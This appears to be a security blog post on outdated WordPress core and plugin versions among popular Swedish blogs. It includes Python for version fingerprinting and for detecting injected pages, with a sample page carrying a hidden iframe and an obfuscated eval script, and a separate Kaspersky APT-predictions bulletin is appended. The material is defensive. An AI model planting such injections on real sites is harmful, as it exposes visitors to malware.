I decided to look at the biggest CMS (WordPress) and the top 50 biggest and most visited blogs in Sweden to see if they were vulnerable to any common, known vulnerabilities. Not all of the top 50 websites were running WordPress; some were running custom software or another CMS. Another obstacle was that it was not possible to confirm the exploitability of the identified vulnerabilities: I could only base the research on the version of the software/plugin a site was running, and not all plugins disclose their version numbers, so this report is based only on the version numbers that I was able to identify.

Tools and techniques used

Determining the version number of a specific plugin or piece of software is straightforward enough: you simply look at the source code of the pages and follow the links on the website. WordPress exposes its own version in a few well-known places: one is the <meta name="generator"> tag in the page header, another is the RSS feed, if feeds are enabled. The feed contains a <generator> element whose value carries the WordPress version number.

In addition to this, you can enumerate the plugins directory (wp-content/plugins/) and look for "readme" or installation notes. Most plugins ship a readme.txt whose "Stable tag" line, changelog or installation notes state the version, and some even print the version on the page or in the ?ver= query string of the scripts and stylesheets they load.

Once the version number has been identified, there are plenty of public resources you can use to check whether that specific plugin is vulnerable to any known attacks. I mainly used two sources: www.exploit-db.com and www.wpvulndb.com.
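Putting the steps above together, here is an added example in Python (not part of the original article and not WPScan's code) that extracts the core version from the generator meta tag and from the feed, plugin versions from readme.txt "Stable tag" lines and from the ?ver= query string on enqueued assets, and then compares what it found against a placeholder advisory table using a numeric version comparison. The host example-blog.test, the plugin slugs acme-slider and acme-forms, their "advisories" and all sample responses are constructed for the example; 5.2.3 as the latest core release is taken from the version table later in this article.

```python
import re
from xml.etree import ElementTree as ET

# ---- Constructed sample responses -------------------------------------------
# Stand-ins for what a scanner would fetch from a hypothetical blog at
# https://example-blog.test/ (the front page, its /feed/, and one plugin's
# readme.txt). The plugin slugs acme-slider and acme-forms are made up.
SAMPLE_HTML = """<!DOCTYPE html><html><head>
<meta name="generator" content="WordPress 4.9.8" />
<link rel="stylesheet" href="https://example-blog.test/wp-content/plugins/acme-slider/css/slider.css?ver=2.1.0" />
<script src="https://example-blog.test/wp-content/plugins/acme-forms/js/forms.min.js?ver=1.4.7"></script>
<script src="https://example-blog.test/wp-includes/js/jquery/jquery.js?ver=1.12.4"></script>
</head><body></body></html>"""

SAMPLE_FEED = """<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"><channel><title>Example blog</title>
<generator>https://wordpress.org/?v=4.9.8</generator>
</channel></rss>"""

SAMPLE_README = """=== ACME Slider ===
Contributors: acme
Stable tag: 2.1.0

== Changelog ==
= 2.1.0 =
* Bug fixes."""

# Placeholder advisories for the made-up plugins: slug -> [(description, fixed_in)].
# Not real advisories; a real scanner queries wpvulndb.com / exploit-db.com here.
PLUGIN_ADVISORIES = {
    "acme-slider": [("placeholder: unauthenticated SQL injection", "2.1.1")],
    "acme-forms": [("placeholder: stored XSS", "1.4.0")],
}
LATEST_CORE = "5.2.3"  # newest core release that appears in the article's table


def parse_version(text):
    """'4.9.8' -> (4, 9, 8); '5.0' -> (5, 0, 0), so that 5.0 compares equal to 5.0.0."""
    parts = [int(p) for p in re.findall(r"\d+", text)][:3]
    return tuple(parts + [0] * (3 - len(parts)))


def is_older(found, fixed_in):
    """True if `found` precedes `fixed_in`. Numeric tuples avoid the classic
    string-comparison bug where '4.9.8' sorts after '4.9.10'."""
    return parse_version(found) < parse_version(fixed_in)


def core_version_from_html(html):
    """WordPress emits <meta name="generator" content="WordPress X.Y.Z" /> unless a theme removes it."""
    m = re.search(r'<meta\s+name="generator"\s+content="WordPress\s+([\d.]+)"', html)
    return m.group(1) if m else None


def core_version_from_feed(xml_text):
    """The feed's <generator> element carries the version as https://wordpress.org/?v=X.Y.Z."""
    gen = ET.fromstring(xml_text.encode()).find("./channel/generator")
    m = re.search(r"[?&]v=([\d.]+)", gen.text or "") if gen is not None else None
    return m.group(1) if m else None


ASSET_RE = re.compile(r'/wp-content/plugins/([^/"?\']+)/[^"?\']*\?ver=([\d.]+)')


def plugin_versions_from_assets(html):
    """Slug -> version from the ?ver= query string WordPress appends to enqueued
    plugin assets. Caveat: a plugin that enqueues without a version gets the
    *core* version appended instead, so prefer readme.txt where it is exposed."""
    return dict(ASSET_RE.findall(html))


def stable_tag_from_readme(text):
    """wp-content/plugins/<slug>/readme.txt declares the released version as 'Stable tag:'."""
    m = re.search(r"^Stable tag:\s*([\d.]+)", text, re.MULTILINE)
    return m.group(1) if m else None


def assess(html, feed, readmes):
    """Combine the fingerprints and flag an outdated core or plugin versions
    older than the placeholder fix versions. `readmes` maps slug -> readme.txt text."""
    core = core_version_from_html(html) or core_version_from_feed(feed)
    plugins = plugin_versions_from_assets(html)
    for slug, readme in readmes.items():
        tag = stable_tag_from_readme(readme)
        if tag:
            plugins[slug] = tag  # readme beats the asset query string
    findings = []
    if core and is_older(core, LATEST_CORE):
        findings.append(("wordpress", core, "outdated core, latest is " + LATEST_CORE))
    for slug, ver in plugins.items():
        for desc, fixed in PLUGIN_ADVISORIES.get(slug, []):
            if is_older(ver, fixed):
                findings.append((slug, ver, desc + " (fixed in " + fixed + ")"))
    return core, plugins, findings


if __name__ == "__main__":
    core, plugins, findings = assess(SAMPLE_HTML, SAMPLE_FEED, {"acme-slider": SAMPLE_README})
    print("core:", core, "plugins:", plugins)
    for finding in findings:
        print("FINDING:", finding)
```

Two practical points the code encodes: version strings must be compared numerically (a naive string comparison puts 4.9.8 after 4.9.10), and the ?ver= value on a plugin asset is only a hint, because a plugin that enqueues its files without a version gets the core version appended, which is why the readme.txt value wins when both are available.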

A screenshot from wpvulndb.com

A screenshot from exploit-db.com

To automate this process, I teamed up with the WPScan team, who have a tool/API that scans WordPress sites and automatically queries the wpvulndb.com database to check whether the identified plugins and versions are prone to any known vulnerabilities. I thank WPScan for their support in this project! It would have taken me much longer to do this manually.


The results were very interesting: the most visited blogs in Sweden were running outdated software. Thirty-seven percent of the top 40 blogs in Sweden (15 of the 40, listed in the table below) were running an outdated version of WordPress, the oldest dating from 2012. That version is vulnerable to a large number of public exploits, including full remote code execution, which would let an attacker compromise not just the WordPress installation but the server it runs on, too. When checking the server hosting this extremely old installation, I found 13 other websites running on the same server, all of which would be exposed if that host were compromised. Most of the outdated installations were version 4.9.8 from 2018.

One row per outdated installation found:

RELEASE DATE   VERSION   VULNERABILITIES
2012-06-27     3.4.1     41
2013-06-21     3.5.2     19
2016-06-21     4.3.5     19
2018-08-02     4.9.8     11
2018-08-02     4.9.8     11
2018-08-02     4.9.8     11
2018-08-02     4.9.8     11
2018-08-02     4.9.8     11
2018-08-02     4.9.8     11
2018-08-02     4.9.8     11
2018-08-02     4.9.8     11
2019-03-13     5.1.1      1
2019-06-18     5.2.2      8
2019-09-05     5.2.3      6
2019-09-05     5.2.3      6

Source: cvedetails.com and wpvulndb.com

Another interesting fact is that 55% of the researched sites were running the latest version of WordPress, and of those, 50% had a plugin with a history of being vulnerable; but because the plugin version number could not be determined, we do not know whether they are still vulnerable. Only four of these 22 systems had vulnerabilities that were confirmed via the version number.

Spreading the malware

As mentioned before, this is a very common way for cybercriminals to spread malware, but how does it work in real life? After the WordPress site is compromised, the most common technique is to redirect the visitor to a so-called exploit kit. This is a system that fingerprints the visitor's browser and, if a list of requirements is met, delivers the malicious payload to the victim. For example, one of the requirements may be a specific browser: if the exploit kit only has exploits for Firefox, nothing will happen if you visit the website in Chrome or Internet Explorer.

More advanced exploit kits also filter visitors by country, possibly excluding IP ranges belonging to known security companies, law enforcement agencies and other unwanted visitors. The exploit kit also keeps track of successfully infected victims, so the cybercriminals can easily run their operations or sell access to the infected computers.

Exploit kits do not just deliver malware—they can deliver any payload, e.g. by simply redirecting a user to another website or displaying ads. You yourself may have been redirected to a survey or some kind of “amazing” offer. This could have been done using the same techniques as mentioned above.
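As an added illustration (not from the article) of what a site owner or researcher can check from the outside, the following Python checks a fetched page for the usual injection indicators (hidden or off-site iframes, scripts from hosts outside an allowlist, obfuscated inline script, meta-refresh or script redirects off-site) and then compares the page as served to different User-Agent strings: an indicator that only shows up for some browsers is exactly the selective serving described above. The site host, the allowlist, the landing.invalid target and both page variants are constructed for the example.

```python
import re
from urllib.parse import urlparse

SITE_HOST = "example-blog.test"                             # hypothetical blog being checked
ALLOWED_SCRIPT_HOSTS = {SITE_HOST, "fonts.googleapis.com"}  # assumed legitimate script sources

# Constructed responses: what the same URL returned to two User-Agent strings.
# The iframe target landing.invalid is a made-up host.
CLEAN_PAGE = """<html><head>
<script src="https://example-blog.test/wp-includes/js/jquery/jquery.js?ver=1.12.4"></script>
</head><body><p>Hello</p></body></html>"""

INJECTED_PAGE = CLEAN_PAGE.replace("</body>", """
<iframe src="http://landing.invalid/gate.php" width="1" height="1" style="visibility:hidden"></iframe>
<script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65'));</script>
</body>""")

OLD_IE_UA = "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko"
CHROME_UA = "Mozilla/5.0 (X11; Linux x86_64) Chrome/78.0"
RESPONSES_BY_UA = {OLD_IE_UA: INJECTED_PAGE, CHROME_UA: CLEAN_PAGE}

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
SCRIPT_SRC_RE = re.compile(r"<script\b[^>]*\bsrc=[\"']([^\"']+)[\"']", re.I)
INLINE_SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
META_REFRESH_RE = re.compile(r"<meta\b[^>]*http-equiv=[\"']refresh[\"'][^>]*url=([^\"'\s>]+)", re.I)
LOCATION_RE = re.compile(r"(?:window|document|top|self)\.location(?:\.href)?\s*=\s*[\"']([^\"']+)", re.I)


def attr(tag_attrs, name):
    """Value of one attribute inside a tag's attribute string, or '' if absent."""
    m = re.search(r"(?<![\w-])%s\s*=\s*(?:\"([^\"]*)\"|'([^']*)'|([^\s>]+))" % name, tag_attrs, re.I)
    return next((g for g in m.groups() if g is not None), "") if m else ""


def is_offsite(url):
    host = urlparse(url).hostname
    return bool(host) and host != SITE_HOST


def find_indicators(html):
    """Return a sorted list of injection indicators found in one HTML response."""
    found = set()
    for attrs in IFRAME_RE.findall(html):
        src = attr(attrs, "src")
        w, h = attr(attrs, "width"), attr(attrs, "height")
        style = attr(attrs, "style").replace(" ", "").lower()
        tiny = (w.isdigit() and int(w) <= 1) or (h.isdigit() and int(h) <= 1)
        hidden = "display:none" in style or "visibility:hidden" in style
        if tiny or hidden or is_offsite(src):
            found.add("hidden/off-site iframe -> " + src)
    for src in SCRIPT_SRC_RE.findall(html):
        host = urlparse(src).hostname
        if host and host not in ALLOWED_SCRIPT_HOSTS:
            found.add("script from non-allowlisted host -> " + host)
    for body in INLINE_SCRIPT_RE.findall(html):
        obfuscated = (re.search(r"eval\s*\(\s*unescape\s*\(", body)
                      or "fromCharCode" in body
                      or len(re.findall(r"%[0-9a-f]{2}", body, re.I)) >= 8)
        if obfuscated:
            found.add("obfuscated inline script")
        for url in LOCATION_RE.findall(body):
            if is_offsite(url):
                found.add("script redirect -> " + url)
    for url in META_REFRESH_RE.findall(html):
        if is_offsite(url):
            found.add("meta refresh -> " + url)
    return sorted(found)


def cloaking_report(responses_by_ua):
    """Indicators that appear for only some User-Agents. Selective serving is
    itself a strong sign that the page is compromised or carrying malvertising."""
    seen = {}
    for ua, html in responses_by_ua.items():
        for ind in find_indicators(html):
            seen.setdefault(ind, set()).add(ua)
    return {ind: sorted(uas) for ind, uas in seen.items() if len(uas) < len(responses_by_ua)}


if __name__ == "__main__":
    for ind, uas in cloaking_report(RESPONSES_BY_UA).items():
        print(ind, "served only to:", uas)
```

In practice the same comparison is worth repeating from different source networks and with and without a Referer header, since, as the text notes, kits also gate on the visitor's country and on IP ranges they want to avoid.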

Examples of recent and large attacks:

Database leaks

One of the biggest motivators for cybercriminals is financial gain, and although that does not apply to everyone—some attackers have political motivation, others just do it for the adrenaline—making money is still a strong incentive. The cybercriminal ecosystem is huge, and cybercriminals benefit from everything they compromise. Simple things, such as email databases, access to compromised systems or infected computers, email and password combinations, and a lot more are all sold on the black market.

Almost exactly one year ago, I wrote about how much stolen data was being sold on the black market.

Blogs are a goldmine for collecting user data, as they get a lot of visitors who, in many cases, maintain an account on the website to be able to comment on posts. Another reason is that it is very easy to perform social engineering attacks against the visitor, display a fake login page and trick the user into logging in to access “hidden” content.

However, cybercriminals can also exploit SQL injection vulnerabilities, which exist both in older versions of the WordPress core and in many plugins. Such a vulnerability allows an attacker to query the underlying database and retrieve data from it, and in some cases even to modify it or read and write files on the file system.

Fortinet has written a very good article on some of the SQL injection vulnerabilities they found a few months ago.

Are we doomed?

I personally think that this is not a problem we can blame on the technology, because if you look at, say, WordPress, the system is very good at informing you as an administrator that there are updates available. As you can see from the screenshot below, the available updates are shown in two places: Plugins and Dashboard, where WordPress core updates will show up as well.

One reason why the plugins or software is not updated might be that the current theme is not designed to work with the latest version of the plugin and might not function properly if the plugins are updated. Another reason might be that the people administrating the WordPress installation are marketing/PR agencies or web designers, who are only responsible for the layout, not security.

I think that anyone running a website should take a little more responsibility, not just for their brand, but for the systems they use, too. Regardless of whether you are an influencer, a personal blogger or an e-commerce website, it should be in your best interest to ensure that you are not making life easy for cybercriminals. If you are only a customer using these blogging platforms, please ask your provider what their policy is for making sure that the blog is secure.

As a regular Internet user, you need to make sure that you are securing your device and keeping your digital identity safe. A very good tip is to use protection against malicious code, which will identify and prevent these attacks even if the blog or website is infected.

You also need to ensure that you are not reusing your passwords on every site. One example of how you can create strong and unique passwords for every site, without using any additional software, can be found here.

Even if you do all of these, it is also very important that you make sure your device and any software installed on it is up to date with the latest security patches. Running the latest and secure versions makes a great difference.

I am also very glad that you took the time to read this article. It means that we are actually starting to make a difference, and the effort that we, security nerds, do reaches people such as yourself. Thank you and please share this knowledge with people who you believe might benefit from it. We cannot solve everything with technology, and we need to use our common sense and share knowledge among ourselves. We need your help with doing just that!

Kaspersky Security Bulletin 2019. Advanced threat predictions for 2020

20 November 2019 - 11:00


    Nothing is more difficult than making predictions. Rather than trying to gaze into a crystal ball, we will be making educated guesses based on what has happened during the last 12 months, to see where we can see trends that might be exploited in the near future.

    This is what we think might happen in the coming months, based on the knowledge of experts in this field and our observation of APT attacks – since APT threat actors have historically been the center of innovation.

    The next level of false flag attacks

    The use of false flags has become an important element in the playbook of several APT groups. In the past, this has generally involved trying to deflect attention away from those responsible for the attack – for instance, the usage of Russian words in Lazarus group malware, or Romanian words by WildNeutron. In one notable case – the Olympic Destroyer attack – the Hades APT group sought to go further than just clouding the waters of attribution by forging elements of the attack to make it seem like the work of a different threat actor. We believe that this will develop further, with threat actors seeking not only to avoid attribution but to actively lay the blame on someone else.

    For instance, this could include the usage of established backdoors by other unrelated APT actors, the theft and re-use of code (the recently published case of Turla reusing code from an unknown Iranian group, outlined by the UK NCSC and NSA comes to mind) or deliberately leaking source code so that other groups adopt it and muddy the waters further.

    On top of all that, we should consider how actors continually use commodity malware, scripts, publicly available security tools or administrator software during their attacks and for lateral movement, making attribution increasingly difficult. Mixing a couple of false flags into this equation, where security researchers are hungry for any small clue, might be enough to divert authorship to someone else.

    From ransomware to targeted ransomware

    In the last two years we’ve seen a decline in numbers of all-purpose widespread ransomware attacks as cybercriminals have become more targeted in their use of this type of malware – focusing on organizations that are likely to make substantial payments in order to recover their data. We are calling this technique ‘targeted ransomware’. Throughout the year, we recorded several cases where attackers used targeted ransomware, and we think that a likely future development will be more aggressive attempts to extort money. A potential twist might be that, instead of making files unrecoverable, threat actors will threaten to publish data that they have stolen from the victim company.

    In addition to targeted ransomware, it is inevitable that the cybercriminals will also attempt to diversify their attacks to include other types of devices besides PCs or servers. For instance, ransomware in consumer products, such as smart TVs, smart watches, smart cars/houses/cities. As more devices become connected to the internet, cybercriminals will also be looking for ways to monetize their access to these devices. Ransomware is, unfortunately, the most effective tool for extracting a financial profit from the victims.

    New online banking and payments attack vectors

    A new potential attack vector for cybercriminals could open up with the new banking regulations that have recently come into full effect across the EU. The PSD2 (Payment Services Directive) lays down regulatory requirements for companies that provide payment services, including the use of personal data by new fintech companies that are not part of the established banking community. Security of online, including mobile, payments is a key aspect of the legislation. Nevertheless, as banks will be required to open their infrastructure and data to third parties who wish to provide services to bank customers, it is likely that attackers will seek to abuse these new mechanisms with new fraudulent schemes.

    More infrastructure attacks and attacks against non-PC targets

    Determined threat actors have, for some time, been extending their toolsets beyond Windows, and even beyond PC systems: VPNFilter and Slingshot, for example, targeted networking hardware. The benefit to an attacker, of course, is that once they have compromised such devices, it gives them flexibility. They could opt for a massive botnet-style compromise and use that network in the future for different goals, or they might approach selected targets for more clandestine attacks. In our threat predictions for 2019, we considered the possibility of 'malware-less' attacks, where opening a VPN tunnel to mirror or redirect traffic might provide all the necessary information to an attacker. In June, it was revealed that hackers had infiltrated the networks of at least 10 cellular telcos around the world, and had remained hidden for years. In some cases, it seems they had been able to deploy their own VPN services on telco infrastructure.

    The convergence of the physical and cyber worlds brought about by the profusion of IoT devices offers growing opportunities for attackers, and it's evident that threat actors are aware of the potential. This year it was reported that unknown attackers stole 500MB of data from NASA's Jet Propulsion Laboratory using a Raspberry Pi. In December last year, the UK's Gatwick airport was brought to a standstill for fear of a possible collision after at least one drone was sighted above one of the runways. While it's unclear whether this was the result of a hobbyist drone owner or a determined attacker mounting a denial of service by physical means, the fact remains that part of the country's critical infrastructure was brought to a standstill because of the use of a drone. The number of such attacks will undoubtedly grow.

    In recent years, we have seen a number of high-profile attacks on critical infrastructure facilities and these have typically been aligned to wider geo-political objectives. While most infections in industrial facilities continue to be from ‘mainstream’ malware, this fact itself highlights just how vulnerable these facilities can be. While targeted attacks on critical infrastructure facilities are unlikely ever to become a mainstream criminal activity, we do expect to see the number grow in the future. Geo-political conflicts are now played out in a world where the physical and cyber are increasingly converging; and, as we have observed before, such attacks offer governments a form of retaliation that lies between diplomacy and war.

    Increased attacks in regions that lie along the trade routes between Asia and Europe

    Clausewitz’s dictum, “War is merely the continuation of politics by other means”, can be extended to include cyberconflict, with cyberattacks reflecting wider real-world tensions and conflicts. We have seen numerous examples. Consider, for example, accusations of Russian interference in US elections and fears about a possible reboot of this in the run-up to the 2020 elections. We’ve seen it in the ‘naming-and-shaming’ of alleged Chinese hackers in US indictments. The widespread use of mobile implants to surveil ‘persons of interest’ is another example.

    There are several ways this could play out. They include a growth in political espionage as governments seek to secure their interests at home and abroad. This could mean monitoring the activities of ‘undesirable’ individuals or movements within the country, as well as those of potential opponents abroad. It is likely to extend also to technological espionage in situations of potential or real economic crisis and resulting instability. This could result in new attacks in regions that lie along trade routes between Asia and Europe, including Turkey, East and South Europe and East Africa.

    It’s quite possible that we will see changes to legislation and policy, as governments look to define more clearly what is and what isn’t allowed. On the one hand, this could be used as a way to establish plausible deniability and thereby avoid sanctions if the finger of suspicion is pointed at one state by another. On the other hand, it could enable more aggressive use of technology, as several justice departments seem keen to open the door to different kinds of ‘lawful interception’ to collect evidence on computers. One likely response from criminal groups will be greater use of encryption and the Darknet to conceal their operations.

    Increasing sophistication of attack methods

    It is hard to know exactly how advanced the top-class attackers really are and what kind of resources they have in their pockets. Of course, every year we learn a bit more: for instance, a few years ago we observed an apparently endless supply of zero-days for resourceful attackers who were ready to pay for them. This year we observed several examples, but probably the most interesting is the one involving at least 14 exploits for iOS used during the last two years, as exposed by Google in August.

    The new isolation methods implemented for Microsoft Word and other software traditionally targeted in spear-phishing campaigns might have a significant impact on malware delivery methods, forcing less sophisticated actors to change the way they spread malware.

    We believe it is likely that additional interception capabilities, similar to the Quantum insert attacks described a few years ago, are already being used; and hopefully we will be able to discover some of them.

    It also seems likely that attackers will exfiltrate data with non-conventional methods, such as using signaling data or Wi-Fi/4G, especially when using physical implants (something we also believe is probably being overlooked). In a similar vein, we believe more attackers will use DoH (DNS over HTTPS) in the future to conceal their activities and make discovery more difficult. Finally, it is possible that during the coming months we will start discovering more UEFI malware and infections as our ability to see such systems is slowly improving.

    Use of supply chains will continue to be one of the most difficult delivery methods to address. It is likely that attackers will continue to expand this method through manipulated software containers, for example, and abuse of packages and libraries.

    A change of focus towards mobile attacks

    During the last 10 years, an important transition has taken place: the main storage for our digital lives has moved from the PC to mobiles. Some threat actors were quick to notice this and begin focusing on developing attack tools for mobiles. While we have constantly been predicting a huge increase in the number of attacks against mobiles, the observations from the field haven’t always reflected this inferred evolution. However, the lack of observations of a phenomenon doesn’t necessarily imply that it’s not happening.

    We have already discussed how an attacker abused at least 14 zero-day vulnerabilities in iOS to target certain minorities in Asia. We also saw recently how Facebook sued the Israeli company NSO for allegedly misusing its servers (to deploy malware to intercept user data). We also saw how Android zero-click, full persistence exploits are now more expensive (according to Zerodium’s price list) than those for the iPhone.

    All of this tells us how much money attackers are investing in developing these technologies. It is clear to all of them that nearly everyone has a phone in their pocket and how valuable the information on those devices is. Every year we see new movement in this direction. We also see how complicated it can be for security researchers to obtain technical details about attacks on such platforms, given the lack of visibility and accessibility.

    There are no good reasons to think this will stop any time soon. However, due to the increased attention given to this subject by the security community, we believe the number of attacks being identified and analyzed in detail will also increase.

    The abuse of personal information: from deep fakes to DNA leaks

    We have previously discussed how data leaks help attackers to craft more convincing social engineering attacks. Not every adversary has a complete profile of potential victims to abuse, which makes the increasing amount of leaked data very valuable. This is also true for ‘less targeted’ attacks like the ransomware cases we have already discussed.

    In a world where logged data continues to grow, we can see the danger in what could be considered especially sensitive leaks, for instance when it comes to biometric data. Also, widely discussed deepfakes are providing the technology to make such attacks a possibility, especially when combining this with less obvious attack vectors such as video and audio. We should not forget how this can be automated, and how AI can help with the profiling and creation of such scams.

    Yes, all this sounds futuristic, but it is very similar to some of the techniques discussed for driving election advertisements through social media. This technology is already in use and it is just a matter of time before some attackers take advantage of it.

    The future holds so many possibilities that there are likely to be things that are not included in our predictions. The extent and complexity of the environments in which attacks play out offer so many possibilities. In addition, no single threat research team has complete visibility of the operations of APT threat actors. We will continue to try and anticipate the activities of APT groups and understand the methods they employ, while providing insights into their campaigns and the impact they have.



     Kaspersky Security Bulletin 2019. Advanced threat predictions for 2020 (PDF, English)